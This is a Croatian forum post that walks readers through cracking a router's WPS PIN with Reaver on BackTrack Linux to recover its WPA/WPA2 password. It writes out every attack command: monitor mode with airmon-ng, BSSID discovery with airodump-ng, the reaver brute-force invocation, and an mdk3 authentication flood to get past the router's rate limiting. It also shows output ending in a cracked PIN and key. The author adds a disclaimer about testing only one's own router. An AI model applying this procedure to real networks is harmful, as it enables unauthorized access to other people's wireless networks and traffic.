Gledam ovaj forum još nema nijednu temu o Reaveru, malom programćiću koji bruteforca WPS pin rutera.E sad budući da je mene živo zanimalo kako to radi htio sam to testirati na svom ruteru.Žao mi je što nemam slike jer neznam kako slikat u Linuxu ali sve ću objasniti.E sad da krenemo na sam proces "fuckanja" PIN-a.
Moja wireless karica je AirLive WT2000PCI kupljena prije 2 i pol godine za cca 120 kuna.Reaver je radio na BackTrack 5 R1 distri linuxa.
Prvo što trebate je skinuti Reaver na vaš linux sistem. Najjednostavniji način je
apt-get update
pa onda
apt-get install reaver[img]http://cache.gawker.com/assets/images/lifehacker/2012/01/install-reaver.jpg[/img]
to će vam na backtracku i Ubuntu sam skinuti i installati Reaver.
Idemo dalje,prebacite vašu wireless karticu u monitor mode (airmon-ng start wlan0).
E sad trebate BSSID(mac adresa vašeg routera) to dobijete ako da upišete
airodump-ng mon0[img]http://airdump.cz/files/airodumpng-alfa.png[/img]
Sad kad imate BSSID veše mreže i monitoring mod upišete:
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 --dht-small -vv -a
naravno iza -b ide BSSID vaše mreže.Ako ste sve u redu napravili dobijete nešto ovako.
[img]http://cache.gawker.com/assets/images/lifehacker/2012/01/cracked.jpg[/img]
Naravno ova gore slika pokazuje gotov čin kod vas će biti drukčije.E sad to crackacnje može i mora potrajati.Za to postoje dva razloga.
Prvi je to što je to bruteforcing i to uvijek potraje.Druga stvar je što će vas ruter sam izbacivat, nakon nekih pola sata će vam reaver izbaciti poruku nešto tipa
AP limitira pakete u tom stilu.E sad kad se to dogodi stisnete CTRL+C da zaustavite reaver(ne brinite spremit će vam dosadašnji napredak)i u drugom terminali sa MDK 3
malo zaspamate ruter idućom naredbom.
mdk3 mon0 a
poslje te naredbe još dodate BSSID od vašeg rutera i pustite ga da radi tako 3 minute. Nakon toga CTRL+C pa ponovo pokrenite Reaver.To će vam se dgađati svekih otprilike pola sata pa samo ponovite postupak sa MDK3.I nakond izvjesnog vremena dobijete ovakvu poruku:
[+] 98.38% complete @ 2012-01-21 15:13:17 (2 seconds/attempt)[+] Trying pin 21134784[+] Trying pin 21136504[+] Trying pin 21132964[+] Trying pin 21134135[+] Trying pin 21130182[+] 98.43% complete @ 2012-01-21 15:13:25 (2 seconds/attempt)[+] Trying pin 21139994[+] Trying pin 21135415[+] Trying pin 21137075[+] Trying pin 21138980[+] Trying pin 21138515[+] 98.47% complete @ 2012-01-21 15:13:33 (2 seconds/attempt)[+] Trying pin 21136375[+] Trying pin 21134487[+] Key cracked in 649 seconds[+] WPS PIN: '21***136'[+] WPA PSK: 'moj_wpa_passkey'[+] AP SSID: 'Celicni'
I to je to uspješno ste razbili WPS PIN te došli do WPA/WPA2 key-a.Naravno sve što radite ovdje navedeno radite na svoju odgovornost te na svojem ruteru(susjede ne dirajte,ne želite vjerujte mi).
Ako netko ima pitanja neka slobodno postavi ovdje i pokušat ću objasniti.
Korisni linkovi:
https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver